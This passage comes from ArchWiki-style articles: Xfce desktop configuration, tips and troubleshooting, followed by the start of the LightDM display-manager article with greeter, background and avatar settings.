fg[SELECTED] = "#ffffff"<br />
fg[ACTIVE] = "#ffffff"<br />
}<br />
widget_class "*XfdesktopIconView*" style "xfdesktop-icon-view"<br />
</nowiki>}}<br />
<br />
==== Remove Thunar options from right-click menu ====<br />
<br />
Issue the following command:<br />
<br />
$ xfconf-query -c xfce4-desktop -v --create -p /desktop-icons/style -t int -s 0<br />
<br />
==== One wallpaper across multihead ====<br />
<br />
Open {{ic|xfce4-settings-editor}} and create a new property with the following settings:<br />
<br />
Property: /backdrop/screen0/xinerama-stretch<br />
Type: Boolean<br />
Value: TRUE|1|Enabled<br />
<br />
==== Kill window shortcut ====<br />
<br />
Xfce does not have a shortcut to kill a window, for example when a program freezes.<br />
<br />
With {{Pkg|xorg-xkill}}, use {{ic|xkill}} to interactively kill a window. For the currently active window, use {{Pkg|xdotool}}:<br />
<br />
$ xdotool getwindowfocus windowkill<br />
<br />
Alternatively:<br />
<br />
$ xkill -id "$(xprop -root -notype | sed -n '/^_NET_ACTIVE_WINDOW/ s/^.*# *\|\,.*$//g p')"<br />
<br />
To add the shortcut, use ''Settings > Keyboard'' or an application like {{pkg|xbindkeys}}.<br />
<br />
=== Session ===<br />
<br />
==== Startup applications ====<br />
<br />
To launch custom applications when Xfce starts up, click the ''Applications Menu > Settings > Settings Manager'' and then choose the ''Session and Startup'' option and click the tab ''Application Autostart''.<br />
You will see a list of programs that get launched on startup. To add an entry, click the ''Add'' button and fill out the form, specifying the path to an executable you want to run.<br />
<br />
Alternatively, add the commands you wish to run (including setting environment variables) to [[xinitrc]] (or [[xprofile]] when a [[display manager]] is being used).<br />
<br />
===== Delay application startup =====<br />
<br />
Sometimes it might be useful to delay the startup of an application. Specifying a command such as {{ic|sleep 3 && command}} under ''Application Autostart'' does not work. As a workaround, one can use the following syntax instead:<br />
<br />
sh -c "sleep 3 && command"<br />
<br />
==== Lock the screen ====<br />
<br />
To lock an Xfce4 session through the ''xflock4'' script one of {{Pkg|xscreensaver}}, {{Pkg|gnome-screensaver}}, {{Pkg|slock}} or {{Pkg|xlockmore}} packages needs to be installed. <br />
Alternatively you can set a lock command with<br />
<br />
$ xfconf-query -c xfce4-session -p /general/LockCommand -s "light-locker-command -l" --create -t string''<br />
<br />
If you want to update the command, you can use <br />
<br />
$ xfconf-query -c xfce4-session -p /general/LockCommand -s "light-locker-command -l"<br />
<br />
See [[List of applications/Security#Screen lockers]] for a comprehensive list of screen lockers.<br />
<br />
{{Tip|The {{Pkg|light-locker}} session locker integrates with {{Pkg|xfce4-power-manager}}. If light-locker is installed, a ''Security'' tab is added to the power manager settings and the existing ''Lock screen when system is going for sleep'' setting is relocated under the ''Security'' tab.}}<br />
<br />
==== User switching ====<br />
<br />
Xfce4 has support for user switching when used with a [[Display manager]] that has this functionality - examples being [[LightDM]] and [[GDM]]. Please consult your display manager's wiki page for more information. When you have a display manager installed and configured correctly you can switch users from the 'action buttons' menu item in the panel.<br />
<br />
{{Style|1=This is a [https://bugzilla.xfce.org/show_bug.cgi?id=9307 Xfce bug], so it makes little sense to keep the workaround on 3 pages.}}<br />
<br />
For the User Switch action button to work without GDM, a workaround is required:<br />
* For LXDM - [[LXDM#Simultaneous users and switching users]].<br />
* For LightDM - [[LightDM#User switching under Xfce4]].<br />
<br />
==== Disable saved sessions ====<br />
<br />
Per user, saved sessions can be disabled by executing the following:<br />
$ xfconf-query -t bool -c xfce4-session -p /general/SaveOnExit -s false<br />
Then navigate to ''Applications'' -> ''Settings'' -> ''Session and Startup'' -> ''Sessions'' and click the ''Clear saved sessions'' button.<br />
<br />
{{Tip|If the command above does not change the setting persistently, use the following command instead: {{ic|xfconf-query -c xfce4-session -p /general/SaveOnExit -n -t bool -s false}}}}<br />
<br />
Alternatively, Xfce [https://wiki.xfce.org/howto/kiosk_mode kiosk mode] can be used to disable the saving of sessions systemwide. To disable sessions, create or edit the file {{ic|/etc/xdg/xfce4/kiosk/kioskrc}} and add the following:<br />
<br />
[xfce4-session]<br />
SaveSession=NONE<br />
<br />
If kiosk mode is not working, the user can set read only permissions for the sessions directory:<br />
<br />
$ rm ~/.cache/sessions/* && chmod 500 ~/.cache/sessions<br />
<br />
This will prevent Xfce from saving any sessions despite any configuration that specifies otherwise.<br />
<br />
==== Default window manager ====<br />
<br />
{{Note|For the changes to take effect, you will need to clear the saved sessions and ensure that session saving is disabled when logging out for the first time. Once the window manager of choice is running, session saving can be enabled again.}}<br />
<br />
The files specifying the default window manager are found in the following locations:<br />
*{{ic|~/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-session.xml}} - per user<br />
*{{ic|/etc/xdg/xfce4/xfconf/xfce-perchannel-xml/xfce4-session.xml}} - systemwide<br />
<br />
The default window manager for the user can be set easily using ''xfconf-query'':<br />
$ xfconf-query -c xfce4-session -p /sessions/Failsafe/Client0_Command -t string -sa '''wm_name'''<br />
<br />
If you want to start the window manager with command line options, see the command below:<br />
$ xfconf-query -c xfce4-session -p /sessions/Failsafe/Client0_Command -t string -t string -s '''wm_name''' -s '''--wm-option'''<br />
If you need more command line options, simply add more {{ic|-t string}} and {{ic|-s '''--wm-option'''}} arguments to the command.<br />
<br />
If you want to change the default window manager systemwide, edit the file specified above manually, changing ''xfwm4'' to the preferred window manager and adding more {{ic|1=<value type="string" value="'''--wm-option'''"/>}} lines for extra command line options if needed.<br />
<br />
You can also change the window manager by autostarting {{ic|'''wm_name''' --replace}} using the autostart facility or by running {{ic|'''wm_name''' --replace &}} in a terminal and making sure the session is saved on logout. Be aware though that this method does not truly change the default manager, it merely replaces it at login. Note that if you are using the autostart facility, you should disable saved sessions as this could lead to the new window manager being started twice after the default window manager.<br />
<br />
=== Theming ===<br />
<br />
XFCE themes are available at [http://www.xfce-look.org xfce-look.org]. ''Xfwm'' themes are stored in {{ic|/usr/share/themes/xfce4}}, and set in ''Settings > Window Manager''. [[GTK+]] themes are set in ''Settings > Appearance''.<br />
<br />
To achieve a uniform look for all applications, see [[Uniform look for Qt and GTK applications]].<br />
<br />
See also [[Cursor themes]], [[Icons]], and [[Font configuration]].<br />
<br />
=== Sound ===<br />
<br />
==== Keyboard volume buttons ====<br />
<br />
{{Pkg|xfce4-pulseaudio-plugin}} provides a panel applet which has support for keyboard volume control and volume notifications. As an alternative, you can install {{AUR|xfce4-volumed-pulse}}, which also provides keybinding and notification control, but without an icon sitting in the panel. This is handy, for example, when using {{AUR|pasystray}} at the same time for a finer control.<br />
<br />
Alternatively, [https://git.xfce.org/apps/xfce4-mixer/ xfce4-mixer] also provides a panel applet and keyboard shortcuts which supports Alsa as well. Note however, that it is based on a feature of GStreamer 0.10 which has been abandoned in 1.0.<br />
<br />
For non desktop environment specific alternatives, see [[List of applications#Volume managers]].<br />
<br />
===== Shortcuts =====<br />
<br />
If you are not using an applet or daemon that controls the volume keys, you can map volume control commands to your volume keys manually using Xfce's keyboard settings. For the sound system you are using, see the sections linked to below for the appropriate commands.<br />
*ALSA: see [[Advanced Linux Sound Architecture#Keyboard volume control]].<br />
*PulseAudio: see [[PulseAudio#Keyboard volume control]]<br />
*OSS: see [[OSS#Using multimedia keys with OSS]].<br />
<br />
=== Keyboard Shortcuts ===<br />
<br />
Keyboard shortcuts are defined in two places: ''Settings > Window Manager > Keyboard'', and ''Settings > Keyboard > Shortcuts''.<br />
<br />
=== Polkit Authentication Agent ===<br />
<br />
The {{Pkg|polkit-gnome}} agent will be installed along with {{Pkg|xfce4-session}} and autostarted automatically; no user intervention is required. For more information, see [[Polkit#Authentication agents]].<br />
<br />
A third party polkit authentication agent for Xfce is also available, see {{AUR|xfce-polkit}} or {{AUR|xfce-polkit-git}}.<br />
<br />
=== Display blanking ===<br />
<br />
{{Note|1=There are some issues associated with blanking and resuming from blanking in some configurations. See [https://bbs.archlinux.org/viewtopic.php?id=194313&p=2][https://bugzilla.xfce.org/show_bug.cgi?id=11107].}}<br />
<br />
Some programs that are commonly used with Xfce will control monitor blanking and [[DPMS]] (monitor powersaving) settings. They are discussed below.<br />
<br />
;Xfce Power Manager<br />
Xfce Power Manager will control blanking and DPMS settings. These settings can be configured by running ''xfce4-power-manager-settings'' and clicking the ''Display'' tab. Note that unticking the ''Handle display power management'' option means that the Power Manager will disable DPMS - it does not mean that the Power Manager will relinquish control of DPMS. Also note that it will not disable screen blanking. To disable both blanking and DPMS, right click on the power manager system tray icon or left click on the panel applet and make sure that the option labelled ''Presentation mode'' is ticked.<br />
<br />
;XScreenSaver<br />
{{Out of date|With xfce4-power-manager>1.5.1 the issue described below should in theory no longer apply. [http://git.xfce.org/xfce/xfce4-power-manager/commit/?id&#61;a805071464ecf0fee27d59de15620b035d855eb0]}}<br />
See [[XScreenSaver#DPMS and blanking settings]]. Note that if XScreenSaver is running alongside Xfce Power Manager, it may not be entirely clear which application is in control of blanking and DPMS as both applications are competing for control of the same settings. Therefore, in a situation where it is important that the monitor not be blanked (when watching a film for instance), it is advisable to disable blanking and DPMS through both applications.<br />
<br />
;xset<br />
If neither of the above applications are running, then blanking and DPMS settings can be controlled using the ''xset'' command, see [[DPMS#Modifying DPMS and screensaver settings using xset]].<br />
<br />
== Tips and tricks ==<br />
<br />
=== Hide partitions from thunar and xfdesktop ===<br />
<br />
If your installation partitions are shown as mounted devices on the desktop and in Thunar, try to install {{Pkg|gvfs}}. See [[Udisks#Hide selected partitions]] for more advanced configuration options.<br />
<br />
=== Screenshots ===<br />
<br />
Xfce has its own screenshot tool, {{pkg|xfce4-screenshooter}}. It is part of the {{grp|xfce4-goodies}} group.<br />
<br />
Go to ''Applications > Settings > Keyboard'', ''Application Shortcuts''. Add the {{ic|xfce4-screenshooter -f}} (or {{ic|-w}} for the active window) command to use the {{ic|Print}} key in order to take fullscreen screenshots. See screenshooter's man page for other optional arguments.<br />
<br />
Alternatively, an independent screenshot program like [[Taking a screenshot#scrot|scrot]] can be used.<br />
<br />
=== Disable Terminal F1 and F11 shortcuts ===<br />
<br />
The xfce terminal binds F1 and F11 to help and fullscreen, respectively, which can make using programs like htop difficult. To disable those shortcuts, create or edit its configuration file, then log out and log back in. F10 can disabled in the Preferences menu.<br />
<br />
{{hc|~/.config/xfce4/terminal/accels.scm|<br />
(gtk_accel_path "<Actions>/terminal-window/fullscreen" "")<br />
(gtk_accel_path "<Actions>/terminal-window/contents" "")<br />
}}<br />
<br />
=== Terminal color themes or palettes ===<br />
<br />
Terminal color themes or palettes can be changed in GUI under Appearance tab in Preferences. These are the colors that are available to most console applications like [[Emacs]], [[Vi]] and so on. Their settings are stored individually for each system user in {{ic|~/.config/xfce4/terminal/terminalrc}} file. There are also so many other themes to choose from. Check forum thread [https://bbs.archlinux.org/viewtopic.php?id=51818 Terminal Colour Scheme Screenshots] for hundreds of available choices and themes.<br />
<br />
==== Changing default color theme ====<br />
<br />
XFCE's {{ic|extra/terminal}} package comes with a darker color palette. To change this, append the following in your terminalrc file for a lighter color theme, that is always visible in darker Terminal backgrounds.<br />
<br />
~/.config/xfce4/terminal/terminalrc<br />
<br />
ColorPalette5=#38d0fcaaf3a9<br />
ColorPalette4=#e013a0a1612f<br />
ColorPalette2=#d456a81b7b42<br />
ColorPalette6=#ffff7062ffff<br />
ColorPalette3=#7ffff7bd7fff<br />
ColorPalette13=#82108210ffff<br />
<br />
==== Terminal tango color theme ====<br />
<br />
To switch to tango color theme, open with your favorite editor<br />
<br />
~/.config/xfce4/terminal/terminalrc<br />
<br />
And add(replace) these lines:<br />
<br />
ColorForeground=White<br />
ColorBackground=#323232323232<br />
ColorPalette1=#2e2e34343636<br />
ColorPalette2=#cccc00000000<br />
ColorPalette3=#4e4e9a9a0606<br />
ColorPalette4=#c4c4a0a00000<br />
ColorPalette5=#34346565a4a4<br />
ColorPalette6=#757550507b7b<br />
ColorPalette7=#060698989a9a<br />
ColorPalette8=#d3d3d7d7cfcf<br />
ColorPalette9=#555557575353<br />
ColorPalette10=#efef29292929<br />
ColorPalette11=#8a8ae2e23434<br />
ColorPalette12=#fcfce9e94f4f<br />
ColorPalette13=#72729f9fcfcf<br />
ColorPalette14=#adad7f7fa8a8<br />
ColorPalette15=#3434e2e2e2e2<br />
ColorPalette16=#eeeeeeeeecec<br />
<br />
=== Open URLs by middle mouse in terminal ===<br />
On update to version 0.8 open URL with middle mouse turned off by default and just paste clip to cursor.<br />
To enable old behavior fix next option in {{ic|${XDG_CONFIG_HOME}/xfce4/terminal/terminalrc}} ({{ic|<nowiki>XDG_CONFIG_HOME=${HOME}/.config</nowiki>}} by default)<br />
{{hc|${XDG_CONFIG_HOME}/xfce4/terminal/terminalrc|<nowiki>[Configuration]<br />
MiscMiddleClickOpensUri=TRUE</nowiki>}}<br />
<br />
=== Colour management ===<br />
<br />
Xfce has no native support for colour management. [https://bugzilla.xfce.org/show_bug.cgi?id=8559] See [[ICC profiles]] for alternatives.<br />
<br />
=== Multiple monitors ===<br />
<br />
As of {{Pkg|xfce4-settings}} version 4.11.4, Xfce has support for multiple monitors. Settings can be configured in the ''Applications'' -> ''Settings'' -> ''Display'' dialog. For more information, see the [http://docs.xfce.org/xfce/xfce4-settings/display display] article from the Xfce documentation.<br />
<br />
=== SSH agents ===<br />
<br />
By default Xfce 4.10 will try to load gpg-agent or ssh-agent in that order during session initialization. To disable this, create an xfconf key using the following command:<br />
<br />
xfconf-query -c xfce4-session -p /startup/ssh-agent/enabled -n -t bool -s false<br />
<br />
To force using ssh-agent even if gpg-agent is installed, run the following instead:<br />
<br />
xfconf-query -c xfce4-session -p /startup/ssh-agent/type -n -t string -s ssh-agent<br />
<br />
To use [[GNOME Keyring]], simply tick the checkbox ''Launch GNOME services on startup'' in the ''Advanced'' tab of ''Session and Startup'' in Xfce's settings. This will also disable gpg-agent and ssh-agent.<br />
<br />
Source: http://docs.xfce.org/xfce/xfce4-session/advanced<br />
<br />
=== Scroll a background window without shifting focus on it ===<br />
<br />
Go to ''Main Menu > Settings > Window Manager Tweaks > Accessibility'' tab.<br />
Uncheck ''Raise windows when any mouse button is pressed''.<br />
<br />
=== Mouse button modifier ===<br />
<br />
By default, the mouse button modifier in Xfce is set to {{ic|Alt}}. This can be changed with ''xfconf-query''. For instance, the following command will set the {{ic|Super}} key as the mouse button modifier:<br />
<br />
$ xfconf-query -c xfwm4 -p /general/easy_click -n -t string -s "Super"<br />
<br />
Strictly speaking, using multiple modifiers is not supported. However, as a workaround, multiple modifiers can be specified if the key names are separated with {{ic|><}}. For instance, to set {{ic|Ctrl+Alt}} as the mouse button modifier, you can use the following command:<br />
<br />
$ xfconf-query -c xfwm4 -p /general/easy_click -n -t string -s "Ctrl><Alt"<br />
<br />
=== Set the two fingers click to middle click for a touchpad ===<br />
<br />
{{Style|Convoluted way of simply configuring [[Touchpad Synaptics]]}}<br />
<br />
If you want the 2 finger click on the touchpad to do a middle click, create or edit the following file:<br />
<br />
{{hc|~/.config/xfce4/xfconf/xfce-perchannel-xml/pointers.xml|<nowiki><br />
<channel name="pointers" version="1.0"><br />
<property name="SynPS2_Synaptics_TouchPad" type="empty"><br />
<property name="Properties" type="empty"><br />
<property name="Synaptics_Tap_Action" type="array"><br />
<value type="int" value="0"/><br />
<value type="int" value="0"/><br />
<value type="int" value="0"/><br />
<value type="int" value="0"/><br />
<value type="int" value="1"/><br />
<value type="int" value="2"/><br />
<value type="int" value="3"/><br />
</property><br />
</property><br />
</property><br />
</channel><br />
</nowiki>}}<br />
<br />
The 2 in the array is the middle click.<br />
<br />
=== Limit the minimum brightness of the brightness-slider ===<br />
Limiting the minimum brightness can be useful for displays which turn off backlight on a brightness level of 0. In {{ic|xfce4-power-manager 1.3.2}} a new hidden option had been introduced to set a minimum brightness value with a xfconf4-property. Add {{ic|brightness-slider-min-level}} as an int property in xfconf4. Adjust the int value to get a suitable minimum brightness level.<br />
<br />
== Troubleshooting ==<br />
<br />
=== Action buttons are missing icons ===<br />
<br />
This happens if icons for some actions (Suspend, Hibernate) are missing from the icon theme, or do not have the expected names. To fix this, install an icon theme which has the necessary icons already added; see [[Icons#Xfce icons]]. <br />
<br />
Then, you can switch to that icon theme using Applications -> Settings -> Appearance -> Icons.<br />
<br />
Alternatively you can use the required icons provided by the icon theme you installed in your current icon theme. To do so, you first need to find out what the currently used icon theme is called. You can do so by using the command below:<br />
<br />
$ xfconf-query -c xsettings -p /Net/IconThemeName<br />
<br />
Then set the following variable:<br />
<br />
$ icontheme=/usr/share/icons/''theme-name''<br />
<br />
where ''theme-name'' is the name of the current icon theme.<br />
<br />
Then create symbolic links from the current icon theme into the icon theme providing the icons (this example assumes the icons are being provided by the {{AUR|elementary-xfce-icons}} theme.)<br />
<br />
ln -s /usr/share/icons/elementary-xfce/apps/16/system-suspend.svg ${icontheme}/16x16/actions/system-suspend.svg<br />
ln -s /usr/share/icons/elementary-xfce/apps/16/system-suspend-hibernate.svg ${icontheme}/16x16/actions/system-hibernate.svg<br />
ln -s /usr/share/icons/elementary-xfce/apps/22/system-suspend.svg ${icontheme}/22x22/actions/system-suspend.svg<br />
ln -s /usr/share/icons/elementary-xfce/apps/22/system-suspend-hibernate.svg ${icontheme}/22x22/actions/system-hibernate.svg<br />
ln -s /usr/share/icons/elementary-xfce/apps/24/system-suspend.svg ${icontheme}/24x24/actions/system-suspend.svg<br />
ln -s /usr/share/icons/elementary-xfce/apps/24/system-suspend-hibernate.svg ${icontheme}/24x24/actions/system-hibernate.svg<br />
ln -s /usr/share/icons/elementary-xfce/apps/48/system-suspend.svg ${icontheme}/48x48/actions/system-suspend.svg<br />
ln -s /usr/share/icons/elementary-xfce/apps/48/system-suspend-hibernate.svg ${icontheme}/48x48/actions/system-hibernate.svg<br />
<br />
Log out and in again, and you should see icons for all actions.<br />
<br />
=== Desktop icons rearrange themselves ===<br />
<br />
At certain events (such as opening the panel settings dialog) icons on the desktop rearrange themselves. This is because icon positions are determined by files in the {{ic|~/.config/xfce4/desktop/}} directory. Each time a change is made to the desktop (icons are added or removed or change position) a new file is generated in this directory and these files can conflict.<br />
<br />
To solve the problem, navigate to the directory and delete all the files other than the one which correctly defines the icon positions. You can determine which file defines the correct icon positions by opening it and examining the locations of the icons. The topmost row is defined as {{ic|row 0}} and the leftmost column is defined by {{ic|col 0}}. Therefore an entry of:<br />
<br />
[Firefox]<br />
row=3<br />
col=0<br />
<br />
means that the Firefox icon will be located on the 4th row of the leftmost column.<br />
<br />
=== GTK themes not working with multiple monitors ===<br />
<br />
{{Expansion|Which configuration tools? What does ''ceasing to work'' mean? Is it that new themes cannot be selected or that themes display incorrectly? Is there a bug report?}}<br />
<br />
Some configuration tools may corrupt displays.xml, which results in GTK themes under ''Applications Menu > Settings > Appearance'' ceasing to work. To fix the issue, delete {{ic|~/.config/xfce4/xfconf/xfce-perchannel-xml/displays.xml}} and reconfigure your screens.<br />
<br />
=== Icons do not appear in right-click menus ===<br />
<br />
{{Note|Despite the deprecation of GConf, this method does still work.}}<br />
<br />
Users may find that icons do not appear when right-clicking options within some applications, including those made with [[Qt]]. This problem only appears to happen within Xfce. Run these two commands:<br />
<br />
$ gconftool-2 --type boolean --set /desktop/gnome/interface/buttons_have_icons true<br />
$ gconftool-2 --type boolean --set /desktop/gnome/interface/menus_have_icons true<br />
<br />
=== Keyboard settings are not saved in xkb-plugin ===<br />
<br />
There is a bug in {{Pkg|xfce4-xkb-plugin}} ''0.5.4.1-1'' which causes it to lose keyboard, layout switching and compose key settings. [https://bugzilla.xfce.org/show_bug.cgi?id=10226] As a workaround, enable ''Use system defaults'' in {{ic|xfce4-keyboard-settings}}, then reconfigure ''xfce4-xkb-plugin''.<br />
<br />
=== NVIDIA and xfce4-sensors-plugin ===<br />
<br />
To detect and use sensors of nvidia gpu you need to install {{Pkg|libxnvctrl}} and then rebuild {{Pkg|xfce4-sensors-plugin}} with [[ABS]]. You also have the option of using {{AUR|xfce4-sensors-plugin-nvidia}} which replaces {{Pkg|xfce4-sensors-plugin}}.<br />
<br />
=== Panel applets keep being aligned on the left ===<br />
<br />
Add a separator someplace before the right end and set its "expand" property. [https://forums.linuxmint.com/viewtopic.php?f=110&t=155602}]<br />
<br />
=== Preferred Applications preferences have no effect ===<br />
<br />
Most applications rely on [[xdg-open]] for opening a preferred application for a given file or URL.<br />
<br />
In order for xdg-open and xdg-settings to detect and integrate with the Xfce desktop environment correctly, you need to [[install]] the {{Pkg|xorg-xprop}} package.<br />
<br />
If you do not do that, your preferred applications preferences (set by exo-preferred-applications) will not be obeyed.<br />
Installing the package and allowing ''xdg-open'' to detect that you are running Xfce makes it forward all calls to ''exo-open'' instead, which correctly uses all your preferred applications preferences.<br />
<br />
To make sure xdg-open integration is working correctly, ask ''xdg-settings'' for the default web browser and see what the result is:<br />
<br />
# xdg-settings get default-web-browser<br />
<br />
If it replies with:<br />
<br />
xdg-settings: unknown desktop environment<br />
<br />
it means that it has failed to detect Xfce as your desktop environment, which is likely due to a missing {{Pkg|xorg-xprop}} package.<br />
<br />
=== Restore default settings ===<br />
<br />
If for any reason you need to revert back: to the default settings, rename {{ic|~/.config/xfce4-session/}} and {{ic|~/.config/xfce4/}}<br />
<br />
$ mv ~/.config/xfce4-session/ ~/.config/xfce4-session-bak<br />
$ mv ~/.config/xfce4/ ~/.config/xfce4-bak<br />
<br />
Relogin for changes to take effect. If you get {{ic|Unable to load a failsafe session}} upon login, see the [[#Session failure]] section.<br />
<br />
=== Session failure ===<br />
<br />
Symptoms include:<br />
<br />
* The mouse is an X and/or does not appear at all;<br />
* Window decorations have disappeared and windows cannot be closed;<br />
* ({{ic|xfwm4-settings}}) will not start, reporting {{ic|These settings cannot work with your current window manager (unknown)}};<br />
* Errors reported by a [[display manager]] such as {{ic|No window manager registered on screen 0}}.<br />
* Unable to load a failsafe session:<br />
<br />
Unable to load a failsafe session.<br />
Unable to determine failsafe session name. Possible causes: xfconfd isn't running (D-Bus setup problem); environment variable $XDG_CONFIG_DIRS is set incorrectly (must include "/etc"), or xfce4-session is installed incorrectly. <br />
<br />
Restarting xfce or rebooting your system may solve the problem, but a corrupt session is the likely cause. Delete the session folder:<br />
<br />
$ rm -r ~/.cache/sessions/<br />
<br />
Also make sure that the relevant folders in {{ic|$HOME}} are owned by the user starting {{ic|xfce4}}. See [[Chown]].<br />
<br />
=== Fonts in window title crashing xfce4-title ===<br />
<br />
[[Install]] {{Pkg|ttf-droid}} and {{Pkg|ttf-dejavu}}. See also {{Bug|44382}}.<br />
<br />
=== Laptop lid settings ignored ===<br />
<br />
You may find that the lid close settings in Xfce4 Power Manager are ignored, meaning that the laptop will always suspend on lid close, no matter what settings are chosen in the power manager. This is because the power manager is not set to handle lid close events by default. Instead, logind handles the lid close event. To change this behavior so that the the power manager handles lid close events, execute the following command:<br />
$ xfconf-query -c xfce4-power-manager -p /xfce4-power-manager/logind-handle-lid-switch -s false<br />
<br />
{{Note|Under some circumstances, the {{ic|logind-handle-lid-switch}} setting will get set to true when changes are made to the laptop lid actions or the lock on suspend setting. See [https://bugzilla.xfce.org/show_bug.cgi?id&#61;12756#c2]. In this case, you will need to toggle {{ic|logind-handle-lid-switch}} to false again.}}<br />
<br />
=== Power Manager Plugin shows battery time and remaining percentage ===<br />
<br />
Since 1.5.1 an hidden option has been introduced to configure a label on the statusbar. The new xfconf4 option {{ic|show-panel-label}} of type {{ic|int}} can be configured for different label formats. {{ic|show-panel-label}} can be set to 0 (no label), 1 (percentage), 2 (remaining time) or 3 (both).<br />
<br />
Source: [https://mail.xfce.org/pipermail/xfce-announce/2015-June/000424.html 1.5.1 release notes]<br />
<br />
== See also ==<br />
<br />
* [http://www.xfce.org/about/ Xfce - About]<br />
* http://docs.xfce.org/ - The complete documentation.<br />
* [http://www.xfce-look.org/ Xfce-Look] - Themes, wallpapers, and more.<br />
* [http://xfce.wikia.com/wiki/Frequently_Asked_Questions Xfce Wikia] - How to edit the auto generated menu with the menu editor<br />
* [http://wiki.xfce.org Xfce Wiki]</div>Wakehttps://wiki.archlinux.org/index.php?title=LightDM&diff=306740LightDM2014-03-23T16:26:03Z<p>Wake: /* Sources of Arch-centric 64x64 Icons */ Fix indent-level</p>
<hr />
<div>[[Category:Display managers]]<br />
[[es:LightDM]]<br />
[[fr:LightDM]]<br />
[[ja:LightDM]]<br />
[[zh-CN:LightDM]]<br />
{{Related articles start}}<br />
{{Related|Display manager}}<br />
{{Related|GDM}}<br />
{{Related|KDM}}<br />
{{Related|LXDM}}<br />
{{Related articles end}}<br />
<br />
[http://www.freedesktop.org/wiki/Software/LightDM LightDM] is a cross-desktop [[display manager]] that aims to be the standard display manager for the X server. Its key features are:<br />
* A lightweight codebase<br />
* Standards compliant (PAM, logind, etc)<br />
* A well defined interface between the server and the user interface.<br />
* Cross-desktop (user interfaces can be written in any toolkit).<br />
<br />
More details about LightDM's design can be found [http://www.freedesktop.org/wiki/Software/LightDM/Design here].<br />
<br />
== Installation ==<br />
Install {{Pkg|lightdm}} from the [[official repositories]]. You can also install {{AUR|lightdm-devel}} for the development branch or {{AUR|lightdm-bzr}} from the [[AUR]].<br />
<br />
=== Greeter===<br />
You will also need to install a greeter (a user interface for LightDM). The reference greeter is ''lightdm-gtk-greeter'', which is provided by {{Pkg|lightdm-gtk2-greeter}} or {{Pkg|lightdm-gtk3-greeter}}. KDE users can install {{Pkg|lightdm-kde-greeter}}, a greeter based on Qt.<br />
<br />
Other greeters can be installed from the [[AUR]] as well: <br />
* {{AUR|lightdm-another-gtk-greeter}}: A GTK3 greeter with custom theme support<br />
* {{AUR|lightdm-webkit-greeter}}: A greeter that uses Webkit for theming.<br />
* {{AUR|lightdm-crowd-greeter}}: A 3D greeter that lets you select your profile from 3D characters walking around.<br />
* {{AUR|lightdm-unity-greeter}}: The greeter used by Ubuntu's [[Unity]].<br />
* {{AUR|lightdm-razor-greeter}}: A greeter for the [[Razor-qt]] desktop environment.<br />
* {{AUR|lightdm-pantheon-greeter}}: A greeter from the ElementaryOS Project.<br />
<br />
You can change the default greeter by changing the configuration file to state:<br />
{{hc|/etc/lightdm/lightdm.conf|<br />
greeter-session&#61;lightdm-yourgreeter-greeter<br />
}}<br />
<br />
== Enabling LightDM ==<br />
Make sure to enable the {{ic|lightdm}} daemon using [[systemd#Using units|systemctl]] so it will be started at boot.<br />
<br />
== Command line tool ==<br />
LightDM offers a command line tool, {{ic|dm-tool}}, which can be used to lock the current seat, switch sessions, etc, which is useful with 'minimalist' window managers and for testing. To see a list of available commands, execute:<br />
$ dm-tool --help<br />
<br />
== Testing ==<br />
First, [[Pacman|install]] {{Pkg|xorg-server-xephyr}} from the [[official repositories]].<br />
<br />
Then, run LightDM as an X application:<br />
$ lightdm --test-mode --debug<br />
<br />
== Optional configuration and Tweaks ==<br />
Some greeters have their own configuration files. For example, {{Pkg|lightdm-gtk2-greeter}} and {{Pkg|lightdm-gtk3-greeter}} have:<br />
/etc/lightdm/lightdm-gtk-greeter.conf<br />
and {{Pkg|lightdm-kde-greeter}} has:<br />
/etc/lightdm/lightdm-kde-greeter.conf<br />
as well as a section in KDE's System Settings (recommended).<br />
<br />
LightDM can be configured by directly modifying its configuration script or by using the {{ic|lightdm-set-defaults}} applications<br />
that can be found in {{ic|/usr/lib/lightdm/lightdm/}}. To see some of the options available, execute:<br />
$ man lightdm-set-defaults<br />
<br />
There are, however, a lot more variables to modify in the configuration file than by using the {{ic|lightdm-set-defaults}} application.<br />
<br />
=== Changing Background Images/Colors ===<br />
Users wishing to have a flat color (no image) may simply set the '''background''' variable to a hex color.<br />
<br />
Example:<br />
background=#000000<br />
<br />
If you want to use an image instead, see below.<br />
<br />
==== GTK+ Greeter ====<br />
Users wishing to customize the wallpaper on the greeter screen need to edit {{ic|/etc/lightdm/lightdm-gtk-greeter.conf}} defining the '''background''' variable.<br />
<br />
Example:<br />
background=/usr/share/pixmaps/black_and_white_photography-wallpaper-1920x1080.jpg<br />
<br />
==== Unity Greeter ====<br />
Users using the {{AUR|lightdm-unity-greeter}} must edit the {{ic|/usr/share/glib-2.0/schemas/com.canonical.unity-greeter.gschema.xml}} file and then execute:<br />
# glib-compile-schemas /usr/share/glib-2.0/schemas/<br />
<br />
According to [https://bbs.archlinux.org/viewtopic.php?id=149945 this] page.<br />
<br />
{{Note|It is recommended to place the PNG or JPG file in {{ic|/usr/share/pixmaps}} since the LightDM user needs read access to the wallpaper file.}}<br />
<br />
==== KDE Greeter ====<br />
Go to ''System Settings > Login Screen (LightDM)'' and change the background image for your theme.<br />
<br />
=== Changing your avatar ===<br />
<br />
==== The .face way ====<br />
Users wishing to customize their image on the greeter screen need to place an PNG image called {{ic|.face}} or {{ic|.face.icon}} in their home directory. Make sure it can be read by LightDM.<br />
<br />
{{Note|As of December 2013, some people have issues where the icon file does not get picked up. The preferred way is to install accountsservice and use the following AccountsService way.}}<br />
<br />
==== The AccountsService way ====<br />
The .face way is known to cause issues, fortunately LightDM is able to use AccountsService automatically. First make sure the {{pkg|accountsservice}} package ([[official repositories]]) is installed, then set it up as follows, replacing <username> with the desired user's login name. The use of the .png file extension is presumably optional.<br />
<br />
* Edit or create the file {{ic|/var/lib/AccountsService/users/<username>}}, and add the line[s]<br />
<br />
[User]<br />
Icon=/var/lib/AccountsService/icons/<username>.png<br />
<br />
* Create the file {{ic|/var/lib/AccountsService/icons/<username>.png}} using a 96x96 PNG icon file.<br />
<br />
=== Sources of Arch-centric 64x64 Icons ===<br />
The {{AUR|archlinux-artwork}} package from the [[AUR]] contains some nice examples that install to {{ic|/usr/share/archlinux/icons}} and that can be copied to {{ic|/usr/share/icons/hicolor/64x64/devices}} as follows:<br />
# find /usr/share/archlinux/icons -name "*64*" -exec cp {} /usr/share/icons/hicolor/64x64/devices \;<br />
<br />
After copying, the {{AUR|archlinux-artwork}} package can be removed.<br />
<br />
=== Enabling Autologin ===<br />
